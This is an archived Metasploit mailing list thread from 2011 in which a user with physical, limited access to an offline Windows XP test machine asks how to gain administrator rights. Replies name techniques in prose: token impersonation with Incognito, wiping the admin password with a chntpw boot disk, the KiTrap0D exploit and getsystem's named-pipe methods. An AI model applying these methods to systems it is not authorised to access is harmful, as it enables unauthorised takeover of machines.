Metasploit mailing list archives
Re: Privilege escalation on an isolated system
From: Brahim Sakka <brahim.sakka () gmail com>
Date: Sun, 27 Nov 2011 23:50:23 +0100
Thanks everyone for the suggestions and the answers. As suggested by many, I have settled for wiping out the admin's password using Linux. Not as stealthy as what MSF offers, but I guess it's the easiest way for me to get admin access. 2011/11/26, James Butler <jamie.e.butler () gmail com>:
Please forgive me if I am understanding your request wrong but if you have physical access to the machine and want escalated privelages I would not use metasploit. Why not boot via a bootable chntpw disk and have fun - obviously only if you have permission to do so On Nov 25, 2011 10:47 PM, "Kevin Shaw" <kevin.lee.shaw () gmail com> wrote:I wouldn't bother with meterpreter, just find a local privilege escalation exploit. You have access to the system, you don't need much in the way of sparkle. On Nov 25, 2011 5:30 PM, "Lukas Kuzmiak" <lukash () backstep net> wrote:Hey man, I would simply try to break down the getsystem from meterpreter and use its single parts to gain the system privileges. external/source/meterpreter/source/extensions/priv/server/elevate: elevate.c - handler for 4 privilege escalation exploits/techniques there (other 4 .c files) you might either play with those (they were ported for metasploit, so it won't be enough to just compile and run, you'd have to get rid of the meterpreter structures) or (perhaps an easier path) just use those as an inspiration and look on the internet for local implementations of those. from elevate.c: // firstly, try to use the in-memory named pipe impersonation technique (Requires Local Admin rights) // secondly, try to use the in-memory KiTrap0D exploit (CVE-2010-0232) (Requires Local User rights and vulnerable system) // thirdly, try to use the in-memory service token duplication technique (Requires Local Admin rights and SeDebugPrivilege) // fourthly, try to use the touching disk named pipe impersonation technique (Requires Local Admin rights) that's what getsystem basically does, so you can just follow the same path manually and see where you can get. hope i helped at least a little. or just look for other local windows exploits on the internet :) cheers, lukash On Fri, Nov 25, 2011 at 10:39 PM, Brahim Sakka <brahim.sakka () gmail com> wrote:Thanks haZ and Roberto. Let me explain the situation again. The Windows system I'm facing is not connected to a network (it has no NICs). I have unprivileged user access into it. It is _not_ an access through a meterpreter shell, it's just a classic user/password combo that I'm using (I have phisical access to the box). My question is: is there a way to leverage MSF's privilege exploitation capabilities in order to get admin privileges on this box? 2011/11/25, Roberto Espreto <robertoespreto () gmail com>:Hi! Launch the Incognito module, list the available tokens and impersonatetheone you want. Regards, 2011/11/25 Brahim Sakka <brahim.sakka () gmail com>Hello list, I have a Windows XP SP3 test system with a limited user account. I want to escalate my privileges and "getsystem". Typically, I would generate an evil file with MSF, get a meterpreter shell then getsystem. However, in this particular case, the system cannot be connected to any network (no NICs). Also, I can't install MSF itself on it because I don't have the required privileges. Is it somehow possible to leverage the framework's built-in privilege escalation capabilities in order to get admin priveleges? _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-- *Roberto S. Soares (espreto)* robertoespreto () gmail com espreto () hacktraining com br www.hacktrainig.com.br http://codesec.blogspot.com Skype: hack_training Twitter @espreto ®_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Privilege escalation on an isolated system Brahim Sakka (Nov 25)
- Re: Privilege escalation on an isolated system haZard0us (Nov 25)
- Re: Privilege escalation on an isolated system Roberto Espreto (Nov 25)
- Re: Privilege escalation on an isolated system Brahim Sakka (Nov 25)
- Re: Privilege escalation on an isolated system 5.K1dd (Nov 25)
- Re: Privilege escalation on an isolated system Lukas Kuzmiak (Nov 25)
- Re: Privilege escalation on an isolated system Kevin Shaw (Nov 25)
- Re: Privilege escalation on an isolated system Brahim Sakka (Nov 25)
- <Possible follow-ups>
- Re: Privilege escalation on an isolated system James Butler (Nov 26)
- Re: Privilege escalation on an isolated system Brahim Sakka (Nov 27)
- Re: Privilege escalation on an isolated system Lukas Kuzmiak (Nov 27)
- Re: Privilege escalation on an isolated system Justin Rogosky (Nov 28)
- Re: Privilege escalation on an isolated system Tim Brown (Nov 30)
- Re: Privilege escalation on an isolated system Enis Sahin (Nov 30)
- Re: Privilege escalation on an isolated system The Doctor (Dec 01)
- Re: Privilege escalation on an isolated system Brahim Sakka (Dec 01)
- Re: Privilege escalation on an isolated system Brahim Sakka (Dec 13)
- Re: Privilege escalation on an isolated system Brahim Sakka (Nov 27)
- Re: Privilege escalation on an isolated system Tommy Elliott (Dec 22)